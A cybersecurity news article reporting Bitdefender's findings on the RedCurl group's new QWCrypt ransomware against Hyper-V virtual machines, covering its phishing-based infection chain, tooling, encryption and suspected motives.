RedCurl, a cyberespionage group active since 2018, has expanded its operations to include ransomware attacks targeting Hyper-V virtual machines. This marks a significant shift for the group, previously known for its stealthy data exfiltration campaigns against corporate entities worldwide.
The newly discovered ransomware, dubbed QWCrypt, is specifically designed to encrypt virtual machines hosted on Microsoft’s Hyper-V platform. This contrasts with most ransomware attacks that focus on VMware ESXi servers. Bitdefender Labs researchers, who uncovered the ransomware, noted a change in RedCurl’s tactics.
“We’ve seen RedCurl stick to their usual playbook in most cases, continuing with data exfiltration over longer periods of time,” their report states. “However, one case stood out. They broke their routine and deployed ransomware for the first time.”
QWCrypt’s infection chain begins with phishing emails containing .IMG files disguised as resumes. These files, when opened, automatically mount as a new drive and execute a malicious screensaver vulnerable to DLL sideloading. This technique uses a legitimate Adobe executable to download the main payload and establish persistence through a scheduled task.
RedCurl employs “living-off-the-land” binaries to maintain a low profile on compromised systems. A custom wmiexec variant facilitates lateral movement within the network, evading security tools. The Chisel tool provides tunneling and RDP access for remote control. Encrypted 7z archives and a multi-stage PowerShell process disable security defenses before ransomware deployment.
QWCrypt offers several command-line arguments to customize attacks, including options to exclude specific VMs (--excludeVM), encrypt Hyper-V VMs (--hv), kill VM processes (--kill), and turn off Hyper-V VMs (--turnoff). In observed attacks, RedCurl used the --excludeVM argument to avoid disrupting network gateways.
The ransomware uses the XChaCha20-Poly1305 encryption algorithm and appends either the .locked$ or .randombits$ extension to encrypted files. It also supports intermittent encryption (block skipping) and selective file encryption based on file size to speed up the process. The ransom note, “!!!how_to_unlock_randombits_files.txt$”, borrows text from LockBit, HardBit, and Mimic ransom notes.
The absence of a dedicated leak site suggests the ransomware’s purpose might be a distraction, a fallback for failed data extortion services, or a genuine attempt at financial gain through private negotiations.
“The RedCurl group’s recent deployment of ransomware marks a significant evolution in their tactics,” Bitdefender concludes. “This departure from their established modus operandi raises critical questions about their motivations and operational objectives.”
Bitdefender proposes two hypotheses for RedCurl’s shift towards c. The first is that RedCurl operates as a mercenary group, blending espionage with financially motivated attacks. Ransomware could serve as a distraction from data theft or a way to monetize access when clients don’t pay for data collection. The second theory suggests RedCurl engages in ransomware for profit but prefers private negotiations over public leaks.
